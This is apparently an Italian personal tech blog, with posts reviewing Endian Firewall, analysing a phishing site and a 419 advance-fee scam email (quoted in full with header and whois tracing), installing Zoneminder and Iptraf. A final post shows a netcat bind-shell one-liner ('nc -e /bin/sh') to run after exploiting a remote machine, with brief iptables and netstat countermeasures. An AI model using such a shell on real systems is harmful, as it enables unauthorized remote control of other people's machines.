Endian - un firewall semplice e completo

Ho avuto la necessità qualche giorno fa, di preparare un firewall perimetrale per un'azienda. A differenza però dell'approccio standard, il focus principale non era sulla sicurezza dall'esterno verso l'interno (che comunque è importante, come IDS eccetera) ma era sul filtrare il comportamento degli utenti verso internet.
L'esperienza mi ha diretto verso le classiche IpCop / Smoothwall e compagnia bella, ma queste sono tutte non nativamente incentrate sul controllo dell'utente.
Fortunatamente ho trovato Endian Firewall, una creazione di una azienda italiana molto promettente. Di base il loro business si basa (a quanto ho capito) sulle appliance, ma distribuiscono una versione community della loro distribuzione Linux.
Nativamente Endian ha una semplice gestione del traffico in uscita, permettendo con pochi click di gestire i servizi che si vogliono permettere (ad esempio deve essere possibile navigare su porta 80, 443 https eccetera).
Un altro fondamentale punto a favore è la presenza di una semplice interfaccia verso squid + dansguardian, il proxy http che analizza anche il contenuto delle pagine visitate e blocca il traffico a seconda di un determinato punteggio ottenuto dalla pagina stessa, calcolato sulla base di parole chiave specificate. E' inoltre possibile utilizzare blacklist e whitelist.
Endian è anche proxy ftp, smtp eccetera. Ha anche il servizio antivirus (ClamAV), Snort per il rilevamento intrusioni, può fare da time server e da server DHCP.

In poche parole è semplice e ha tutto quello di cui avevo bisogno.

Consigliata!

Analisi di un tentativo di phishing

Oggi ho trovato una delle tante mail di phishing nella mia casella di posta. La novità è che finalmente cliccando sul link fasullo, il sito ha funzionato! Questo significa che non è ancora stato segnalato. Notate la "è" accentata trasformata in un carattere russo.

In questo modo ho potuto analizzare alcune tecniche utilizzate.

1. Il link è al sito http://www.hastyawardsdirect.com/bancoposta/. Hastyawardsdirect.com è uno strano sito...
2. si viene reindirizzati a http://sitoposteitaliane232.freehostia.com/bancoposta/
3. Qualsiasi cosa si inserisca, esce una pagina di errore
4. Il sito freehostia.com è un portale di una webfarm: sicuramente sono all'oscuro di tutto, quindi ecco un bel "abuse reporting"

Che dire...fatto bene!!

Videosorveglianza con Linux - Zoneminder

Alcune istruzioni per installare Zoneminder, un ottimo software per la videosorveglianza. Supporta molti tipi di videocamere / webcam, è in grado di riconoscere il movimento in un flusso video e avvisare tramite mail se si sono verificati "eventi" anomali.
L'installazione sotto Ubuntu è come al solito semplice (necessita di apache2 installato):

sudo apt-get install zoneminder

Ora carichiamo la configurazione dell'interfaccia web di zoneminder in apache2:

sudo ln -s /etc/zm/apache.conf /etc/apache2/conf.d/zoneminder.conf

Aggiungiamo l'utente www-data (quello di apache) al gruppo video, in modo che possa raggiungere i device speciali /dev/videoX

sudo adduser www-data video

Impostiamo la cartella temporanea di zoneminder di proprietà dell'utente www-data

sudo chown www-data.www-data /usr/share/zoneminder/temp

Riavviamo i servizi di zoneminder e di apache2

sudo /etc/init.d/zoneminder restart sudo /etc/init.d/apache2 restart

Ora basta andare sul browser all'indirizzo http://localhost/zm/

I risultati, dopo aver inserito la mia webcam Usb come "Monitor" (in modo che sia un semplice flusso video non controllato) , sono visibili negli screenshots seguenti.
Ricordo che è possibile impostare la webcam come "modect" in modo che generi eventi di allarme se riconosce del movimento nel flusso video.

Tool di rete: Iptraf

Scusandomi della bassa frequenza dei post di questo blog (purtroppo lavoro :-D) oggi voglio accennare l'esistenza di un comodissimo strumento di rete, chiamato IpTraf.
E' installabile semplicemente con un classico (da terminale):
sudo apt-get install iptraf
Per eseguirlo necessita dei privilegi di root, quindi bisogna anteporre sudo.
Questo programma mostra in tempo reale tutte le connessioni (badate bene, non i pacchetti) con un po' di statistiche dettagliate.Si può anche selezionare una o tutte le interfacce di rete.

Molto utile!

Analizziamo lo spam - Truffa

Oggi, scaricando la posta, mi è arrivata una bella mail in inglese da parte di una certa signora Miriam Daivds. Colgo l'occasione per mostrare la mail truffa e per analizzarla:

RAVE YOUR INDULGENCE

Greetings to you in the most wonderful name of our God Almighty. His richest blessings shall be upon you forever.

I am Mrs. Miriam Davids, I am 51 years old from Netherlands, I am deaf and suffering from a long time cancer of the Lungs which also affected my brain, from all indication my conditions is really deteriorating and it is quite obvious that, according to my doctors they have advised me that I live for the next four months, this is because the cancer stage has gotten to a very bad stage.

I was brought up from a motherless babies home, was married to my late husband for twenty years without a child. My husband died in a fatal motor accident. Before his death we were true Christians.

Since his death I decided not to re-marry, I sold all my inherited belongings and deposited all the sum of $13.5 million dollars with a Security Company. Presently, this money is still with them and the management just wrote me as the true owner to come forward to receive the money for keeping it so long Or rather issue a letter of authorization to somebody to receive it on my behalf since I can not come over because of my illness or they get it seized.

Presently, I'm with my laptop in a hospital where I have been undergoing treatment for cancer of the lungs. I have since lost my ability to talk and my doctors have told me that I have only a few months to live.It is my last wish to see that this money is invested to any organization of your choice and distributed each year among the charity organizations, the poor and the motherless babies' homes where I come from.

I want you as a God fearing person, to also use this money to fund churches, orphanages and widows. I took this decision, before I rest in peace because my time will soon be up. As soon as I receive your reply I shall give you the contact of the Security Company. I will also issue you a letter of authority that will improve you as the new beneficiary of my fund.

Please assure me that you will act accordingly as I stated herein.
I shall wait at your prayerful reply .

Yours truely,
Mrs Miriam Daivds.

Spettacolo. Povera donna olandese vedova con 51 anni e malata. A quanto pare, il marito le ha lasciato una bella somma. Come al solito, si offre di dare tutto a me...tanto è sicura che li spenderò per chiese, orfanotrofi... la fregatura? Oltre al fatto che non è vera neanche una parola (ti sto scrivendo da un portatile nell'ospedale dove mi sto curando), se si risponde prima o poi chiederà soldi (qualche migliaio) per costi di transazione eccetera. Peccato che i 13 milioni di dollari promessi non li vedrà mai nessuno :-D. La mail è inviata dall'indirizzo miriam.davids88@yahoo.ca...in teoria, Yahoo Canadese.

Ora analizziamo da dove proviene la mail: la donna dice di essere olandese. Vediamo...apriamo le intestazioni della mail da Thunderbird: Visualizza -> Intestazioni -> Tutte.
Mi soffermo su un campo:
Received: from gmail.com (dsl-243-177-27.telkomadsl.co.za [41.243.177.27]) by mx.google.com with SMTP id q26si1603340ele.6.2007.12.21.04.28.59;

Umh, questo (dsl-243-177-27.telkomadsl.co.za) non mi ispira per niente. Apro il terminale e uso il whois, che mi mostra le seguenti informazioni:

% This is the AfriNIC Whois server.

% Note: this output has been filtered.

% Information related to '41.243.0.0 - 41.243.255.255'

inetnum:        41.243.0.0 - 41.243.255.255
netname:        IPNET-BROADBAND
descr:          Telkom SA Limited
descr:          Integrated Network Planning
descr:          Private Bag X74
descr:          Pretoria
descr:          Gauteng
descr:          0001
country:        ZA
admin-c:        MST95-AFRINIC
tech-c:         PB455-AFRINIC
tech-c:         JDU24-AFRINIC
status:         ASSIGNED PA
mnt-by:         TELKOM-SA-IPNET-MNT
remarks:        noc e-mail: , phone: +27-12-680-0224
remarks:        abuse e-mail: , phone: +27-12-680-7561
source:         AFRINIC # Filtered
parent:         41.240.0.0 - 41.247.255.255

Bello vero? L'indirizzo Ip da cui è stata spedita la mail viene da un servizio di broadband in Pretoria...Sudafrica :-) Cavolo, spiegate a questa povera donna morente che è ad uno stadio avanzato, pensa addirittura di essere in Olanda e invece è in Africa...

Non cascateci!!!!

Creare una shell remota su linux "on the fly"

Vediamo un veloce tips su come creare shell remote su un sistema linux.
Ipotizziamo di riuscire ad eseguire un comando su una macchina remota (buffer overflow, vulnerabilità web...):

nc -vv -l -p 10000 -e /bin/sh

Questo comando utilizza netcat, il coltellino svizzero del tcp/ip (come viene chiamato). Non fa altro che rimanere in ascolto (-l) sulla porta 10000 (-p) ed eseguire un comando (-e). In questo caso, esegue una shell di comando. Inutile dire che se eseguito come root, avrete da remoto i diritti dell'amministratore...
Per provarla, basta collegarsi da un'altro computer (o dallo stesso se volete testarlo in locale, aprite un'altra scheda nel terminale) e digitare:

nc -vv localhost 10000

Il (-vv) è il very verbose, utile ma non indispensabile. Certo, la shell è molto stupida (non ha colori; non riesce a ricevere input dopo l'esecuzione del comando, ad esempio premere la barra durante il comando more). Però funziona ;-)

Contromisure: creare delle regole iptables che mantengano tutte le porte esterne chiuse (tranne quelle usate dai servizi indispensabili: la 80 per un server web ad esempio, rimarrà aperta).
E' anche possibile creare uno script (eseguibile periodicamente via cron) che controlli le connessioni aperte. Per visualizzarle infatti è disponibile il comando:

netstat -an

In questo modo è possibile controllare le socket connected e listen ;-)

PS: dopo aver terminato la prima connessione alla shell remota, quest'ultima si chiuderà. Per far si che rimanga aperta, bisogna creare uno script apposito...google docet ;-)